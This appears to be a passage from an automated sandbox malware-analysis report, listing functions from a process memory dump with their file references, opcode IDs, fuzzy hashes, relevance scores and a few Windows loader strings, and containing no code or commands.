                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: 0596548b6c1297ebfe0b41498f95bbce54382d9d2f76c2a2bab084b239b0dd27
                                                                                                                                                                                            • Instruction ID: b731c63c450c0d097131a61b156de1f8f7fc6250d9d315fbe02f5026eee9ab38
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0596548b6c1297ebfe0b41498f95bbce54382d9d2f76c2a2bab084b239b0dd27
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F310072906308AFC311DF24C880A6A77A9FF44764F154269ED55DF2A1CB31ED42CBE0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF56E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: 35ba42917ca5647da3b1a47b9b417fda31fd55b8ba1638ca2dbc5df559217843
                                                                                                                                                                                            • Instruction ID: a0a83488a155b1d986fff18a01d7b15fbecb76e226379f87a076b3d871a63bff
                                                                                                                                                                                            • Opcode Fuzzy Hash: 35ba42917ca5647da3b1a47b9b417fda31fd55b8ba1638ca2dbc5df559217843
                                                                                                                                                                                            • Instruction Fuzzy Hash: BB31AF39B21B05FFE7869F24DA80A89BBA5FF84650F445056F94187E51CB36E830CF90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2B890 Relevance: 1.6, APIs: 1, Instructions: 86timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: e712d1241e652c36de0b508562ef8fa1f494dba19e2832b7c2352a0fe2a71c68
                                                                                                                                                                                            • Instruction ID: 8c1648f6253c886a252c25fc08da3b41f094e0a44827a097435ef4eac1c8afd1
                                                                                                                                                                                            • Opcode Fuzzy Hash: e712d1241e652c36de0b508562ef8fa1f494dba19e2832b7c2352a0fe2a71c68
                                                                                                                                                                                            • Instruction Fuzzy Hash: 10318B39A11B49BFE7069B20CA44A89BF66FF44A58F445061FD9187E61CB71E830CBD0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF3536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: ff2e22da2e6bb9073cc08f6ec4721e69d81b9cdd2231c18650897ae44e15d325
                                                                                                                                                                                            • Instruction ID: 9d1a5810961ba7f580d96befe7a1818d62b71550993b2b4b76d2e51b7e35727e
                                                                                                                                                                                            • Opcode Fuzzy Hash: ff2e22da2e6bb9073cc08f6ec4721e69d81b9cdd2231c18650897ae44e15d325
                                                                                                                                                                                            • Instruction Fuzzy Hash: 84210475902700FFD7A2EF24C944B5ABBA4FFC4B10F450059E841CBA41C772E888CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D01BE7 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: dc1a714d9647ff130ed9c0680c480c4cda7e3ee508f5a61d25407c5174728a43
                                                                                                                                                                                            • Instruction ID: a42df8c8cdab6746e92dbc1f30efd818b66159f32e2f3574c0c8016fd9ce172f
                                                                                                                                                                                            • Opcode Fuzzy Hash: dc1a714d9647ff130ed9c0680c480c4cda7e3ee508f5a61d25407c5174728a43
                                                                                                                                                                                            • Instruction Fuzzy Hash: 80216D39601B409FE722CB28C881B56F7E6FF88B54F18856DE596876A0DB74E841CF90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE92AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: 62e836ad5328e1bbca9fa767941bb27b993142ad2e03b82921d6da9d64e9ea35
                                                                                                                                                                                            • Instruction ID: 3d74fec3a02bfb8033ff753ed0c2b050bc2b9df89dd59a797a48dd170c597134
                                                                                                                                                                                            • Opcode Fuzzy Hash: 62e836ad5328e1bbca9fa767941bb27b993142ad2e03b82921d6da9d64e9ea35
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FF0FA32200B00ABD7319B08CC04F8ABBEDEF80B00F08011CA982D38A0C6A4F909CA60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D79603 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c3eb7df8bebc4b51467598934917e9d140fa726e0d3bf56c8e5079a084c20b46
                                                                                                                                                                                            • Instruction ID: 1ed1245b37a72d2531ffd8e0439ebf4013ddaea2babcd8d64946702e2ab420b1
                                                                                                                                                                                            • Opcode Fuzzy Hash: c3eb7df8bebc4b51467598934917e9d140fa726e0d3bf56c8e5079a084c20b46
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AE06573714204ABEB04DB58D845B5E77ECEB88798F14019DF50BD7140D670DD01DA50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                                                            • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                            • Instruction ID: b17b446da086c838d78d3495b4e2794229e9a34845f051815ec4987062c3768f
                                                                                                                                                                                            • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F6169B5D01319ABEF51DFA9C840BDEFBB8EF84B54F20411AE810E7250DB758A45CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7395B Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: CWDIllegalInDLLSearch
                                                                                                                                                                                            • API String ID: 0-473384322
                                                                                                                                                                                            • Opcode ID: 77b39a8bf4b9dddb28aabc9e1370aa2de004859cb0af31a79abfca4eb44e199e
                                                                                                                                                                                            • Instruction ID: 679a77aec63fe4b549d76e67b1627795e4a7b952881b0efbacd509f22f0e8128
                                                                                                                                                                                            • Opcode Fuzzy Hash: 77b39a8bf4b9dddb28aabc9e1370aa2de004859cb0af31a79abfca4eb44e199e
                                                                                                                                                                                            • Instruction Fuzzy Hash: A251E5B69047529BE312CE54C885B17B7D8FF44B20F440A2AF9A4D7A80D730DD48CBE2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                                                            • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                            • Instruction ID: 70151b5b670610d5eab0aeb17e2159271f4d73c44e4b366997f38064a60caf9a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                            • Instruction Fuzzy Hash: 45517BB2909741AFE7228E14C840F6BB7ECFF85B54F440A29B5909B690DBB5DD04CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D79429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: verifier.dll
                                                                                                                                                                                            • API String ID: 0-3265496382
                                                                                                                                                                                            • Opcode ID: 43490aa7d9145ee1752f3199cfc9b3a31a6ed28642dba45bd16c50c4b86ba4f4
                                                                                                                                                                                            • Instruction ID: 497f07ee52494fac1d09f48c4ffbe5c9633af8cddd499c5a465d4c51f2351416
                                                                                                                                                                                            • Opcode Fuzzy Hash: 43490aa7d9145ee1752f3199cfc9b3a31a6ed28642dba45bd16c50c4b86ba4f4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 453108B7B103119FE7149F28D850B2677E6EF49BA4F94442AE60ADF381EA71CD818750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2BB5B Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: LdrpInitializeProcess
                                                                                                                                                                                            • API String ID: 0-2689506271
                                                                                                                                                                                            • Opcode ID: 9e1384df81c66edbc022d2d55321efe032d599744bd808392e2e72b8384b6584
                                                                                                                                                                                            • Instruction ID: c96857d99160c14a2c287600c8ab250488e834de6ad6b5e6782b0d7369efe1d9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e1384df81c66edbc022d2d55321efe032d599744bd808392e2e72b8384b6584
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D41B4B6914308AFD311DF51C940EAB7BECEF48B58F50892AF1A1D2540D7B0DA49CFA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D27425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                                            • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                            • Instruction ID: da5c4123eb26418be85a99f627c902aad0d17676a2e406640b28b43b1c85441b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3241C175A00619DFDB25CF98C490BBEBBB5FF40B09F40405AF89197601DB35A982C7A1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Flst
                                                                                                                                                                                            • API String ID: 0-2374792617
                                                                                                                                                                                            • Opcode ID: 823cd01ba0033a95488723b02e7b1e68248cfe7f69dee81b8ad8042e195abac0
                                                                                                                                                                                            • Instruction ID: b79209b87b58a81c8ed976b6814ab68cd77718d2dd4c517a390cfb804e77db1c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 823cd01ba0033a95488723b02e7b1e68248cfe7f69dee81b8ad8042e195abac0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E41BAB1605301DFD704CF18C080A16FFE9EB89B18F58816EE8A9DB781DB71D846CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE96E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: 3fw3fw
                                                                                                                                                                                            • API String ID: 3446177414-2670639126
                                                                                                                                                                                            • Opcode ID: 6a3d58f2d029cfa4d6b1dd64a2fad085eae2eefeadbcd8842ccb5ad03c2b4305
                                                                                                                                                                                            • Instruction ID: 5bbcc1f369acac16637eb90fb701d5f15d99048a33dcc8fd77fccdf1e07a8e1a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a3d58f2d029cfa4d6b1dd64a2fad085eae2eefeadbcd8842ccb5ad03c2b4305
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4421FF76A00710AFC3219F69C840B1ABBF5FF84B65F160829A5A4DBB41DB78D904CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D4717A Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9b408d66b5e994a754cda2cee1e9953c1f556597ec63d5eee759357c848388e2
                                                                                                                                                                                            • Instruction ID: bc24e514733d82e427bbd54574e2abea71088b4ec0cff701de13111785423362
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b408d66b5e994a754cda2cee1e9953c1f556597ec63d5eee759357c848388e2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A42B275E006168FDB04CF59C8806AEB7B6FF88754F58855DE4A6AB740DF30E942CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1B1E0 Relevance: .6, Instructions: 629COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3fd9d65baa84f8a545c1c3281865aac90c42afa0c066e739dd18cfd336b8c47e
                                                                                                                                                                                            • Instruction ID: 572ce53121f5dc026ba2854e0fe515d6fcc6414c29615143e1c975a3d76060f2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fd9d65baa84f8a545c1c3281865aac90c42afa0c066e739dd18cfd336b8c47e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2832A2B6E01219DFDF14DFA8E880BAEBBB1FF44754F180029E845AB350D7759925CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DB124C Relevance: .6, Instructions: 571COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: bb23188577f99cbcb2feba8851dac1079d51e45127cf42d01977795d57f0fa29
                                                                                                                                                                                            • Instruction ID: 473ce507838f7e05cb9f3d2356df4401c44c0dff2bf0bc8cabb9f623f84c919f
                                                                                                                                                                                            • Opcode Fuzzy Hash: bb23188577f99cbcb2feba8851dac1079d51e45127cf42d01977795d57f0fa29
                                                                                                                                                                                            • Instruction Fuzzy Hash: A9229E79A002168FDF09CF59C490AAEB7B6BF89744F58816DD857EB344DB30E942CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DB18DA Relevance: .6, Instructions: 559COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 83d3744882a2fb17c0ef2387695508f974f1657f407baa939f901111a15c7464
                                                                                                                                                                                            • Instruction ID: 30cf984f9872a7bdbbf3628c9b80fa2dcdedaac83a771f9a0230f95e4f27c57b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 83d3744882a2fb17c0ef2387695508f974f1657f407baa939f901111a15c7464
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C226A756043128FDB09CF18C490A2AB3F5FF89B54B588A6DE997CB351DB30E846CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CFD700 Relevance: .3, Instructions: 342COMMON
